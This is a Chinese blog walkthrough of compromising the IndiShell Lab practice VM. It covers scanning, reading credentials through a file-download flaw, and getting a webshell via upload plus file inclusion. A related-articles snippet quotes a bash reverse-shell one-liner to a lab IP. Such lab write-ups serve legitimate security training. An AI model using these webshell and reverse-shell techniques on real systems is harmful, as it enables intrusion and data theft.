[[IndiShell Lab]]靶机实验

最新推荐文章于 2024-03-22 22:58:43 发布
最新推荐文章于 2024-03-22 22:58:43 发布
阅读量676 收藏
点赞数 1
文章标签: 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42890862/article/details/107048123
版权

一、nmap扫描192.168.6.0网段存活主机
在这里插入图片描述二、扫描各个ip的80端口是否开启(发现192.168.6.1/10/12/105中80端口开启)
在这里插入图片描述三、测试发现192.168.6.12为目标网站,对其进行详细扫描
在这里插入图片描述四、进入该网站首页
在这里插入图片描述五、通过目录扫描,发现以下目录root@kali:~# dirb “http://192.168.6.12”
在这里插入图片描述六、进入到各目录页面中
在这里插入图片描述在这里插入图片描述
此页面提示有蹊跷!!!!
在这里插入图片描述七、在url中写入路径发现页面没有变化,则判断数据提交方式为post,在test.php页面中使用hackbar插件,用post方法下载各个文件,在c.php中找到配置文件,发现了相关数据库名及密码
在这里插入图片描述在这里插入图片描述八、进入到192.168.6.12/phpmy页面中使用密码进入其数据库,找到用户名及密码
在这里插入图片描述九、进入该网站
在这里插入图片描述十、此处有文件上传位置,发现只能上传图片格式的文件,上传1.t格式文件发现也不能上传,则判断为白名单的验证方式(白名单上传文件使用截断或漏洞解析方式,但发现php版本为5.3.10,不能使用截断)
在这里插入图片描述

标题

十一、上传文件名为.gif的一句话木马文件上传失败,给其加上文件头后上传成功,但是不能解析成.php文件,而且php文件死活传不上去,此时考虑文件包含
在这里插入图片描述十二、在panel.php配置文件中发现存在文件包含,且为POST请求方式(无法在url中实现,考虑使用插件hackbar提交post请求)
在这里插入图片描述十三、使用文件包含上传.jpg文件,提交post请求页面显示包含成功,但是无法显示是否上传解析成功
在这里插入图片描述十四、考虑直接写入一个文件,将该文件以文件包含的形式上传,进入页面后发现上传解析成功
在这里插入图片描述在这里插入图片描述在这里插入图片描述十五、使用菜刀或蚁剑连接进入其目录
在这里插入图片描述

豆豆的豆芽儿
关注
Neos的渗透测试靶机练习——Wakanda
qq_38678845的博客
01-19 3034
一次渗透测试靶机练习,希望对我们能有所帮助。
搭建DVWA渗透靶机实验
Mystic_JJ的博客
12-30 849
实验名称:搭建DVWA渗透靶机实验 实验目的:熟悉搭建DVWA渗透靶机 实验环境:操作系统:Windows 7 Win2K8r2x64 实验步骤: 1、将安装包复制粘贴到Win2K8r2x64的C盘xampp下的htdocs即可。 2、将文件进行解压,打开DVWA解压DVWA_jisuxia文件,右键“添加到压缩文件”进行一键压缩。配置htdocs点击DVWA目录下的config下的config.inc.php右键打开vim编辑 3、进入vim编辑器,进行修改配置文件 21行修改密码Pa98653
CTF综合靶场渗透系列-Billu_b0x
lza20001103的博客
10-11 4037
CTF综合靶场渗透系列-Billu_b0x
OWASP Mutillidae 靶机实验指导书
06-08
该指导书对每个页面存在漏洞进行了详细分类,对OWASP Top 10 应用安全风险-2017中的漏洞举例说明,结合靶机使用还不错。
vulnhub-DC7靶机实验
m0_64118193的博客
12-03 190
官网地址: https://download.vulnhub.com/dc/DC-6.zip 靶机文件下载后导入即可使用,靶机只有一个flag值 DC6靶机IP地址: 192.168.18.128 kali攻击机IP地址:192.168.18.101 开放端口,,我们进行网站登陆 在主机上进行查询用户信息 下载文件后进行解压,在中发现有用信息 用户名 密码 是一种基于密钥的加密方式,使用了一对密钥对消息进行,来保证消息的安全传输格式是用来加密文件的。 如果这个文件可写,那么直接就可以了。使用看一下权限,
happycorp_1 靶机实验实战演练
lianliandad的博客
06-29 1012
happycorp_1靶机
2021-12-16 综合靶机实验
夕阳的街道的博客
12-16 2906
一、实验题目:综合靶机实验 二、实验内容: 1.使用msf搜索可利用漏洞(drupal) 2. 寻找目标网站的配置文件 3.数据库管理员提权(更新管理员密码或者添加一个新用户) 4. suid提权的命令(nmap、vim、find、bash、more、less、nano、cp) 三、实验环境: 1.kali虚拟机:192.168.112.130 2. 靶机:192.168.112.138 四、实验步骤: 1.搜索存活靶机,输入命令: masscan 网段 -p 80 ..
Me and My Girlfriend靶机实验
sdfsergfr的博客
12-09 588
Me and My Girlfriend靶场练习,本地登录利用X-F-F头解决,解决了初学者dirsearch遇到的问题以及提权检查脚本LinEnum.sh的下载和利用。但是靶场注册用户注册没有成功,借鉴了师傅们的账号密码
vulnhub-XXE Lab: 1靶机实验
桜的博客
03-29 376
vulnhub-XXE Lab: 1靶机实验 靶机: 下载链接:https://download.vulnhub.com/xxe/XXE.zip 虚拟机设置为net模式 使用nmap探测下目标ip:192.168.124.136 网页是apache默认页面 使用kali枚举一下目录,扫出来一个robots.txt文件 访问http://192.168.124.136/robots.txt ...
Vulnhub之Chronos:1 靶机实验
weixin_64112307的博客
06-30 1089
EJS-RCE
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
多节点实验靶机练习(二)
guowenkecom的博客
11-22 423
目录项目名称:实验环境:靶机下载地址:实验要求:所需工具:环境搭建项目实施1. 测试网站的访问性2.信息收集3.漏洞探寻及利用 项目名称: 实验靶机练习(二) 实验环境: Linux内网机器两台 window 2003 一台 win2003 为外网可以访问到的机器 网卡为nat IP为192.168.100.130 靶机下载地址: 实验要求: 找到三个flag,禁止在实验过程中操作虚拟机 所需工具...
靶机实战(g0rmint)
weixin_45605313的博客
07-04 445
g0rmint实验环境实验过程信息收集主机发现端口扫描服务发现目录扫描漏洞发现漏洞利用反弹shell提权总结 实验环境 靶机:g0rmint 测试机:kali(IP:192.168.186.128),win10 实验过程 信息收集 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 服务发现 查看web主页,没有主页 目录
vulnhub-Billu_b0x(getshell成功)
qq_43006864的博客
03-29 1733
这一篇是接上一篇,上一篇没getshell。后面查了原因。然后紧跟 上面一篇文章开始。 开始弹shell。这里用到的命令。echo “bash -i >& /dev/tcp/192.168.1.113/4321 0>&1“ | bash 需进行url编码,这里我使用小火狐进行编码,之前用站长工具能在线编码会出现头尾无法编码的现象, 编码后 :%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%2...
靶机渗透测试实战(八)——Billu_creat_Files渗透实战
橘子女侠
05-11 2912
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
PHP文件包含漏洞利用思路与Bypass总结手册(三)
蚁景网安学院
05-06 519
绕过姿势我们平常很多时候碰到的情况肯定不会是简单的include $_GET['file'];这样直接把变量传入包含函数的。在很多时候包含的变量/文件不是完全可控的。现在...
[ 转]渗透测试实战-billu b0x2靶机入侵
zgy956645239的博客
03-01 846
billu b0x2靶机 老规矩 nmap 开路 通过探测可以看到该靶机一共开放了5个端口,我们还是把目光放在80端口上 访问如图: 看到底下 该网站使用了 “Drupal”框架搭建,前几个月该框架曝光过一个高危漏洞,根据这些靶机的惯用尿性,应该是存在该漏洞的。通过MSF来搜索该漏洞,如图: 发现有漏洞,调用模块输入ip和payload,如图: 成功拿下shell。。。。 如图:...
第一次的靶机实验Tr0ll
最新发布
QiingYuu的博客
03-22 336
进行爆破时发现都不行,之后又发现获取密码时的访问目录有个提示(this folder contains the password(此文件夹包含密码)),那么文件名也有可能是密码然后把文件名保存在密码本中尝试爆破一下。发现 Find address 0x0856BF to proceed(翻译为:查找地址0x0856BF以继续),那么对该网址进行访问。之后发现并没有什么有用的信息,继续查看其他端口信息发现21端口可以匿名登录,进行登录。查找的这两个信息就可以尝试进行ssh连接,可以用hydra进行爆破。
Neos的渗透测试靶机练习——DC-6
qq_38678845的博客
01-11 983
一次渗透测试练习
"Web安全测试靶机部署实验指南 2021.11.24
本次实验的名称是“安装部署Web安全测试用的靶机”,实验人是杨子浩,日期是2021年11月24日。实验的目的是为了安装并部署一个用于Web安全测试的靶机实验的拓扑是在本地环境中进行,使用了XAMPP作为服务器软件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值